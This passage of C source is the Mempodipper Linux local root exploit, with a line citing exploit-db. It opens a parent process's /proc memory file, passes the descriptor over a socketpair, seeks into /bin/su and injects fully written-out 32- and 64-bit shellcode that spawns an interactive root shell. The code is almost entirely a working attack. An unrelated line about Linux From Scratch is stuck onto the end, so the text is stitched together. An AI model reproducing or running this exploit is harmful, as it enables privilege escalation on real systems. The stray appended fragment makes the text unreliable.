			printf("[-] Usage: %s -o ADDRESS\n[-] Example: %s -o 0x402178\n", prog_name, prog_name);
			exit(-1);
		}
	}
	printf("[+] Resolved call address to 0x%lx.\n", address);
	return address;
}

int su_padding()
{
	printf("[+] Calculating su padding.\n");
	FILE *command = popen("/bin/su this-user-does-not-exist 2>&1", "r");
	if (!command) {
		perror("[-] popen");
		exit(1);
	}
	char result[256];
	fgets(result, 256, command);
	pclose(command);
	return strstr(result, "this-user-does-not-exist") - result;
}

int child(int sock)
{
	char parent_mem[256];
	sprintf(parent_mem, "/proc/%d/mem", getppid());
	printf("[+] Opening parent mem %s in child.\n", parent_mem);
	int fd = open(parent_mem, O_RDWR);
	if (fd < 0) {
		perror("[-] open");
		return 1;
	}
	printf("[+] Sending fd %d to parent.\n", fd);
	send_fd(sock, fd);
	return 0;
}

int parent(unsigned long address)
{
	int sockets[2];
	printf("[+] Opening socketpair.\n");
	if (socketpair(AF_UNIX, SOCK_STREAM, 0, sockets) < 0) {
		perror("[-] socketpair");
		return 1;
	}
	if (fork()) {
		printf("[+] Waiting for transferred fd in parent.\n");
		int fd = recv_fd(sockets[1]);
		printf("[+] Received fd at %d.\n", fd);
		if (fd < 0) {
			perror("[-] recv_fd");
			return 1;
		}
		printf("[+] Assigning fd %d to stderr.\n", fd);
		dup2(2, 15);
		dup2(fd, 2);
		unsigned long offset = address - su_padding();
		printf("[+] Seeking to offset 0x%lx.\n", offset);
		lseek64(fd, offset, SEEK_SET);
#if defined(__i386__)
		// See shellcode-32.s in this package for the source.
		char shellcode[] =
			"\x31\xdb\xb0\x17\xcd\x80\x31\xdb\xb0\x2e\xcd\x80\x31\xc9\xb3"
			"\x0f\xb1\x02\xb0\x3f\xcd\x80\x31\xc0\x50\x68\x6e\x2f\x73\x68"
			"\x68\x2f\x2f\x62\x69\x89\xe3\x31\xd2\x66\xba\x2d\x69\x52\x89"
			"\xe0\x31\xd2\x52\x50\x53\x89\xe1\x31\xd2\x31\xc0\xb0\x0b\xcd"
			"\x80";
#elif defined(__x86_64__)
		// See shellcode-64.s in this package for the source.
		char shellcode[] =
			"\x48\x31\xff\xb0\x69\x0f\x05\x48\x31\xff\xb0\x6a\x0f\x05\x48"
			"\x31\xf6\x40\xb7\x0f\x40\xb6\x02\xb0\x21\x0f\x05\x48\xbb\x2f"
			"\x2f\x62\x69\x6e\x2f\x73\x68\x48\xc1\xeb\x08\x53\x48\x89\xe7"
			"\x48\x31\xdb\x66\xbb\x2d\x69\x53\x48\x89\xe1\x48\x31\xc0\x50"
			"\x51\x57\x48\x89\xe6\x48\x31\xd2\xb0\x3b\x0f\x05";
#else
#error "That platform is not supported."
#endif
		printf("[+] Executing su with shellcode.\n");
		execl("/bin/su", "su", shellcode, NULL);
	} else {
		char sock[32];
		sprintf(sock, "%d", sockets[0]);
		printf("[+] Executing child from child fork.\n");
		execl("/proc/self/exe", prog_name, "-c", sock, NULL);
	}
	return 0;
}

int main(int argc, char **argv)
{
	prog_name = argv[0];

	if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'c')
		return child(atoi(argv[2]));

	printf("===============================\n");
	printf("= Mempodipper =\n");
	printf("= by zx2c4 =\n");
	printf("= Jan 21, 2012 =\n");
	printf("===============================\n\n");

	if (argc > 2 && argv[1][0] == '-' && argv[1][1] == 'o')
		return parent(strtoul(argv[2], NULL, 16));
	else
		return parent(find_address());
}
```

Source: http://www.exploit-db.com/exploits/35161/
  25. Start with this: Welcome to Linux From Scratch!